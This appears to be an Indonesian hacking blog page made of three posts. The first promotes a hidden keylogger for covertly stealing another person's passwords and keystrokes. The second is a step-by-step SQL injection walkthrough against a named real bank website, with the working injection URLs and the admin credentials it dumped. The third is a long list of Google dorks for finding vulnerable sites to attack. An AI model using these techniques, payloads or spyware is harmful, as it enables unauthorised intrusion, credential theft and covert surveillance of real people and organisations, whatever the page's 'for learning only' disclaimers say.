Cara Mengambil Password Orang Lain tanpa Diketahui dengan Tools Monitor

Pernahkah terpikir untuk memata-matai seseorang melalui internet? Mngetahui semua yang ia ketikan di keyboard, semua password dan alamat e-mailnya ? Atau meng-hack akun Facebook nya? Atau bagaimana dengan tujuan mulia seperti mengawasi anak-anak anda yang sedang ber-internetan ria…( siapa tahu mereka membuka situs yang tidak pantas atau bahkan sudah memiliki koleksi video panas sendiri di komputer mereka ).

Mungkin anda pernah mencoba jenis applikasi key-logger semacam ini, Tetapi HideTools Spy Monitor, benar-benar lain. Hampir semua kegiatan kita akan dicatat dan dikirim tiap interval waktu tertentu ke alamat e-mail kita. Sehingga sekalipun kita di luar negeri tetap bisa memantau kegiatan anak di komputer. Hal-hal yang dilaporkan antara lain :
Screenshot tampilan layar
Alamat semua website yang dikunjungi
tombol keyboard apa saja yang ditekan
Aktivitas komputer (membuka program dll)
Program apa saja yang sedang berjalan

Aplikasi ini pada awalnya ditujukan bagi parental control, untuk mengawasi apa saja yang dikerjakan oleh bawahan atau anak-anak kita selama menggunakan komputer. Karena cara kerjanya adalah memantau keseluruhan sistem, tidak ada celah lagi bagi bagi anak-anak untuk bermain kucing-kucingan untuk mengakses konten porno tanpa ketahuan.

Jika mereka berani membuka video dewasa atau situs dewasa, kita dapat langsung meng-‘gerebek’ mereka. Sekalipun demikian, dapat juga digunakan untuk tujuan tidak mulia ini.
Dengan aplikasi shareware ini anda dapat mengawasi komputer siapapun, mendapatkan semua karakter yang mereka ketikkan di keyboard, termasuk screenshot tampilan layar dan mengirimkannya ke e-mail anda tanpa ketahuan dan sama sekali tidak terdeteksi jika sang-user tidak waspada.
Program ini benar-benar invisible ( sekalipun terlihat di Task Manager dengan nama wmispe.exe ), dapat diset agar autorun saat windows berjalan, dan dilengkapi dengan proteksi password. Karena tidak terlihat, program ini dapat diakses dengan menekan Ctrl-F1 untuk menampilkan pengaturannya.


Anda dapat mendownload HideTools Spy Monitor di situs mereka.

Read More

hack-website-menggunakan-sql-injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster:    †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm:         †¥²¯d”¥´¹¥•¨±uvw
sekper:           †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi   Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com

Read More

kumpulan dork sql injection update

Berikut adalah Kumpulan Dork SQL Injection update 2010 yang Om canel dapatkan dari blognya teman OM Canel yaitu http://sql-injection-tools.blogspot.com/ . Ok langsung saja bisa dilihat di bawah ini :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

tahu penggunaanya kan? biasanya digunakan untuk mencari Website Vulner yang selanjutnya untuk di Hack. Caranya yaitu ambil salah satu doek misal inurl:title.php?id= lalu taruhkan pada kotak pencarian google dan selanjutnya diikuti dengan Hack Website menggunakan SQL injection

Read More